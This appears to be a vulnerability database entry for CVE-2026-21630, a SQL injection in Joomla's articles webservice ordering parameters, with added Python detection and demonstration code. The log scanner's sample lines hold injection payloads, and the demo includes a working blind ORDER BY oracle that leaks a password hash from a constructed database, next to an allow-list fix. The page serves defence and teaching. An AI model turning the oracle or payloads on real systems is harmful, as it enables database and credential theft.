Cyber Resilience

CVE-2026-21630

Severity: Medium
Published: 01 April 2026
Modified: 09 April 2026
KEV Added: not listed
Patch: available from the vendor (see the Joomla security advisory in the Deeper analysis section)
CVSS v4.0 score: 6.9, vector CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
EPSS score: 0.0034 (25.9th percentile)
Risk Priority: 35 (floored blend · peak EPSS)

Summary

CVE-2026-21630 is a medium-severity SQL injection (CWE-89) vulnerability in Joomla! (vendor: Joomla). Its CVSS v4.0 base score is 6.9 (Medium): the vector rates it network-reachable with low attack complexity and no user interaction, but requiring high privileges (PR:H), with high impact on confidentiality and none on integrity or availability.

Operationally, exploitation maps to the MITRE ATT&CK technique Exploit Public-Facing Application (T1190). EPSS ranks it at the 25.9th percentile by exploit likelihood (below the median), and it is not currently listed in the CISA KEV catalog.

The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-2 (Flaw Remediation).

Deeper analysis

CVE-2026-21630 is a SQL injection vulnerability caused by improperly built ORDER BY clauses in the articles webservice endpoint of Joomla's com_content component. It affects Joomla CMS core and is classified under CWE-89. The issue was published on 2026-04-01. A separate CVSS v3.1 assessment rates it 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H); note that this disagrees with the CVSS v4.0 vector shown at the top of this page, which scores required privileges as high (PR:H) and impact as confidentiality only (VC:H/VI:N/VA:N).

Under the v3.1 vector the flaw is exploitable remotely by low-privileged authenticated users, with low attack complexity and no user interaction required, and successful exploitation is rated as high impact on confidentiality, integrity and availability, up to reading, modifying or deleting database contents. Because the injection point is an ORDER BY clause rather than a WHERE clause or select list, the practical attack is usually blind: the attacker supplies a conditional expression whose truth value changes the sort order of the returned articles and uses that as an oracle to read database contents one guess at a time. Confirm which role is actually required against the vendor advisory before de-prioritising on the strength of the v4.0 PR:H rating.

Joomla's security advisory (https://developer.joomla.org/security-centre/1028-20260302-core-sql-injection-in-com-content-articles-webservice-endpoint.html) addresses the vulnerability, providing details on the affected endpoint and recommending updates to patched versions for mitigation.


Vulnerability details

Improperly built order clauses lead to a SQL injection vulnerability in the articles webservice endpoint.

CWE(s)

CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Related Threats

MITRE ATT&CK Enterprise Techniques (AI-generated mapping)

T1190 Exploit Public-Facing Application Initial Access
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.
Why these techniques?

Direct SQL injection in a public-facing Joomla webservice endpoint allows remote exploitation of the web application from the Internet.

Confidence: HIGH · MITRE ATT&CK Enterprise v19.0
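As an added example, not part of this page or of Joomla's code: a small Python scan over constructed Apache-style access log lines that flags requests to the articles webservice whose ordering parameters carry anything other than a bare (optionally table-qualified) column name or an ASC/DESC keyword. The endpoint path /api/index.php/v1/content/articles and the parameter names list[ordering] and list[direction] are assumptions made for illustration; check the parameter names your Joomla version actually accepts before deploying a rule like this. The log lines are constructed and not from any real incident.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed Apache combined-log style lines (not from a real incident).
# Assumed endpoint path and parameter names; adjust to your deployment.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Apr/2026:10:00:01 +0000] "GET /api/index.php/v1/content/articles?list[ordering]=a.title&list[direction]=asc HTTP/1.1" 200 2310
10.0.0.9 - - [01/Apr/2026:10:00:07 +0000] "GET /api/index.php/v1/content/articles?list[ordering]=(SELECT%20CASE%20WHEN%20(SELECT%20count(*)%20FROM%20users)%3E0%20THEN%20a.id%20ELSE%20a.title%20END)&list[direction]=asc HTTP/1.1" 200 2310
10.0.0.9 - - [01/Apr/2026:10:00:08 +0000] "GET /api/index.php/v1/content/articles?list[ordering]=a.id--&list[direction]=asc HTTP/1.1" 500 0
10.0.0.7 - - [01/Apr/2026:10:00:12 +0000] "GET /index.php?option=com_content&view=article&id=5 HTTP/1.1" 200 8800
"""

# Assumed path of the articles webservice endpoint.
ARTICLES_API = re.compile(r"^/api/index\.php/v1/content/articles(?:/|$)")
# Assumed names of the ordering parameters.
ORDERING_PARAM = "list[ordering]"
DIRECTION_PARAM = "list[direction]"

# A legitimate ordering value is a bare column name, optionally qualified
# with a table alias (e.g. a.title); a direction is asc or desc. Anything
# else (parentheses, quotes, comment markers, whitespace) deserves a look.
SAFE_ORDER_VALUE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*(?:\.[A-Za-z_][A-Za-z0-9_]*)?$")
SAFE_DIRECTION = re.compile(r"^(?:asc|desc)$", re.IGNORECASE)

REQUEST_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def suspicious_ordering_requests(log_text):
    """Return one record per ordering/direction parameter that fails the
    identifier check on a request to the articles webservice."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_LINE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if not ARTICLES_API.match(url.path):
            continue
        # parse_qsl percent-decodes values, so %20 / %3E become the
        # characters the application would actually see.
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            if key == ORDERING_PARAM:
                pattern = SAFE_ORDER_VALUE
            elif key == DIRECTION_PARAM:
                pattern = SAFE_DIRECTION
            else:
                continue
            if not pattern.match(value):
                hits.append({
                    "ip": m.group("ip"),
                    "ts": m.group("ts"),
                    "param": key,
                    "value": value,
                    "status": m.group("status"),
                })
    return hits


if __name__ == "__main__":
    for hit in suspicious_ordering_requests(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} {hit['status']} {hit['param']}={hit['value']!r}")
```

The check is deliberately an allow-list on the shape of the value rather than a blocklist of SQL keywords: a conditional ordering expression used for a blind oracle need not contain any of the usual trigger words, but it cannot be expressed as a bare identifier. A 500 response alongside a flagged value (the third sample line) is a useful corroborating signal that the payload reached the database layer.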

CVEs Like This One

CVE-2026-35222 (same product: Joomla!)
CVE-2026-35221 (same product: Joomla!)
CVE-2026-21629 (same product: Joomla!)
CVE-2026-23899 (same product: Joomla!)
CVE-2024-40749 (same product: Joomla!)
CVE-2024-40748 (same product: Joomla!)
CVE-2026-40383 (same product: Joomla!)
CVE-2026-48899 (same product: Joomla!)
CVE-2026-23898 (same product: Joomla!)
CVE-2026-48904 (same product: Joomla!)

Affected Assets

Vendor: joomla
Product: joomla!
Versions: 3.0.0 through 5.4.4, and 6.0.0 through 6.0.4

Mitigating Controls (NIST 800-53 r5, AI-generated mapping)

SI-2 Flaw Remediation (prevent)
Directly mitigates CVE-2026-21630 by identifying, scanning for, and applying the vendor patch that corrects the improper SQL order clause construction in Joomla's articles webservice.

SI-10 Information Input Validation (prevent)
Prevents SQL injection exploitation by validating input at the articles webservice endpoint so that order-clause values the application does not recognise are rejected rather than passed into the query.

Allow-listing of order-clause values (prevent)
Mitigates the vulnerability by restricting order clause inputs to an allow-list of safe values, such as predefined column names, so that injection payloads never reach the query builder. Escaping is not a substitute here: an ORDER BY target is an identifier or expression position, not a string literal, so it cannot be made safe by quoting.
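The following Python is an added example, not Joomla's code and not the page's own; it illustrates both the bug class described in the Deeper analysis (an ORDER BY clause built from a caller-controlled value, abused as a blind oracle) and the allow-list mitigation described above. The schema, table names and the bcrypt-looking string are constructed for an in-memory SQLite database so the block runs offline; Joomla's real tables, query builder and endpoint code are not reproduced here, and the function and parameter names are assumptions for illustration.

```python
import sqlite3

# Constructed stand-in schema (not Joomla's real #__content / #__users tables).
SCHEMA = """
CREATE TABLE content (id INTEGER PRIMARY KEY, title TEXT, hits INTEGER);
CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO content VALUES (1, 'Zebra', 5), (2, 'Apple', 50), (3, 'Mango', 20);
INSERT INTO users VALUES (1, 'admin', '$2y$10$secret');
"""


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


# --- Vulnerable pattern: caller-controlled ordering pasted into the SQL text ---
def vulnerable_articles_query(ordering, direction):
    # Everything after ORDER BY is interpreted as SQL, so a crafted ordering
    # value becomes an expression the database evaluates for every row.
    return f"SELECT id, title FROM content ORDER BY {ordering} {direction}"


# --- Hardened pattern: map both inputs through fixed allow-lists ---
ALLOWED_ORDERING = {"id": "id", "title": "title", "hits": "hits"}
ALLOWED_DIRECTION = {"asc": "ASC", "desc": "DESC"}


def safe_articles_query(ordering, direction):
    column = ALLOWED_ORDERING.get(str(ordering).lower())
    dirn = ALLOWED_DIRECTION.get(str(direction).lower())
    if column is None or dirn is None:
        # Reject rather than "sanitise": an identifier position cannot be
        # made safe by escaping, so unknown values must never reach the query.
        raise ValueError(f"ordering/direction not in allow-list: {ordering!r} {direction!r}")
    # Only values from the fixed dictionaries are ever interpolated.
    return f'SELECT id, title FROM content ORDER BY "{column}" {dirn}'


def first_id(conn, sql):
    return conn.execute(sql).fetchone()[0]


def oracle_payload(prefix):
    # Conditional ORDER BY: when the guessed prefix is right the rows sort by
    # the integer id (row 1 first); when wrong they sort by the text title
    # ('Apple', row 2, first). The sort order is the side channel, so no data
    # from the users table ever appears in the response body.
    return ("CASE WHEN (SELECT count(*) FROM users WHERE username = 'admin' "
            f"AND password LIKE '{prefix}%') > 0 THEN id ELSE title END")


def leak_hash_prefix(conn, alphabet, length):
    """Recover `length` characters of the admin password hash one guess at a
    time through the vulnerable query's ordering oracle."""
    known = ""
    for _ in range(length):
        for ch in alphabet:
            sql = vulnerable_articles_query(oracle_payload(known + ch), "ASC")
            if first_id(conn, sql) == 1:
                known += ch
                break
        else:
            return known  # no character of the alphabet matched; stop early
    return known


def safe_builder_rejects(ordering, direction):
    try:
        safe_articles_query(ordering, direction)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = open_db()
    print("leaked via ORDER BY oracle:", leak_hash_prefix(db, "$0123456789abcdefghijklmnopqrstuvwxyz", 4))
    print("allow-list rejects payload:", safe_builder_rejects(oracle_payload("$"), "ASC"))
    print("allow-listed query:", safe_articles_query("title", "desc"))
```

Two design points carry over to any real fix: the allow-list maps from the caller's token to a server-side string, so the caller's bytes are never interpolated even when they match; and the direction keyword is allow-listed separately, because an unchecked direction is the same injection point one token to the right.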

References

Joomla Security Centre, advisory 20260302, Core: SQL injection in com_content articles webservice endpoint: https://developer.joomla.org/security-centre/1028-20260302-core-sql-injection-in-com-content-articles-webservice-endpoint.html